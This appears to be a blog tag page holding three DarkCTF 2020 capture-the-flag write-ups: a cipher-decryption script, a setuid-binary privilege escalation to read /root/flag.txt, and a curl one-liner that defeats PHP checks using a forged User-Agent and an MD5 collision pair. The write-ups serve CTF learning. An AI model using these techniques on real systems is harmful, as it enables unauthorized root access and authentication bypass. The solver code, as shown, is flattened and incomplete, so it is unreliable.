Cookie Consent by

Archives of tag darkctf

Tag darkctf

DarkCTF 2020: Cryptography/WEIRD ENCRYPTION


377 points

I made this weird encryption I hope you can crack it.


prefix="Hello. Your flag is DarkCTF{"
main_string="c an u br ea k th is we ir d en cr yp ti on".split()

clear_text = prefix + flag + suffix
enc_text = ""
for letter in clear_text:
c1 = ord(letter) / 16
c2 = ord(letter) % 16
enc_text += main_string[c1]
enc_text += main_string[c2]

print enc_text




main_string = "c an u br ea k th is we ir d en cr yp ti on".split()
flag = open('Encrypted', 'r').read()

def decrypt(letter):
return main_string.index(letter[0]) * 16 + main_string.index(letter[1])

part = ''
letter = []
decrypted = ''
for j, i in enumerate(flag):
part += i
if part in main_string and not (part == 'c' and flag[j+1] == 'r'):
part = ''
if len(letter) == 2:
decrypted += chr(decrypt(letter))
letter = []


DarkCTF{[email protected][email protected]_M3}


DarkCTF 2020: Linux/Squids


470 points

Squids in the linux pool

Note: No automation tool required.

ssh [email protected] -p 10000 password: wolfie


Not much to comment, it take me literally a minute to find the flag.

Found suspicious /opt dir with lots of dirs which I didn't want to manually check, so I've executed find . from within the /opt, found iamroot binary which looks like cat with root permissions (setuid). So I've used the found binary to have a look into /root/flag.txt


DarkCTF 2020: Web/PHP Information

Web/PHP Information

198 points

Let's test your php knowledge.

Flag Format: DarkCTF{}

Corona Web


We started with some php code:

<!DOCTYPE html>
<html lang="en">
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Corona Web</title>

            background-color: whitesmoke

include "flag.php";

echo show_source("index.php");

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['darkctf'])){
        $darkctf = $res['darkctf'];

if ($darkctf === "2020"){
    echo "<h1 style='color: chartreuse;'>Flag : $flag</h1></br>";

if ($_SERVER["HTTP_USER_AGENT"] === base64_decode("MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==")){
    echo "<h1 style='color: chartreuse;'>Flag : $flag_1</h1></br>";

if (!empty($_SERVER['QUERY_STRING'])) {
    $query = $_SERVER['QUERY_STRING'];
    $res = parse_str($query);
    if (!empty($res['ctf2020'])){
        $ctf2020 = $res['ctf2020'];
    if ($ctf2020 === base64_encode("ZGFya2N0Zi0yMDIwLXdlYg==")){
        echo "<h1 style='color: chartreuse;'>Flag : $flag_2</h1></br>";

    if (isset($_GET['karma']) and isset($_GET['2020'])) {
        if ($_GET['karma'] != $_GET['2020'])
        if (md5($_GET['karma']) == md5($_GET['2020']))
            echo "<h1 style='color: chartreuse;'>Flag : $flag_3</h1></br>";
            echo "<h1 style='color: chartreuse;'>Wrong</h1></br>";


There are bunch of ifs, that needs to be defeated before getting the flag:

- darkctf parameter must be set to 2020
- User-Agent must be set to 2020_the_best_year_corona (it came from base64 decoded string MjAyMF90aGVfYmVzdF95ZWFyX2Nvcm9uYQ==)
- ctf2020 parameter must be set to WkdGeWEyTjBaaTB5TURJd0xYZGxZZz09 (it's base64 encoded (not decoded!!) string ZGFya2N0Zi0yMDIwLXdlYg==)
- and the most tricky one, karma and 2020 parameters must not be equal, but their md5 hashes needs to be the same, so we need to use strings which are affected by hash collision

I've used the hexcodes for the karma and 2020 parameters and decoded them into right strings with xxd on the fly, because bash is not doing well with nonprintable characters. Flag has been conquered with following oneliner:

curl -H "User-Agent: 2020_the_best_year_corona" -G --data-urlencode "karma=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f8955ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5bd8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70" | xxd -p -r`" --data-urlencode "2020=`echo "d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f8955ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5bd8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70" | xxd -p -r`" "" --verbose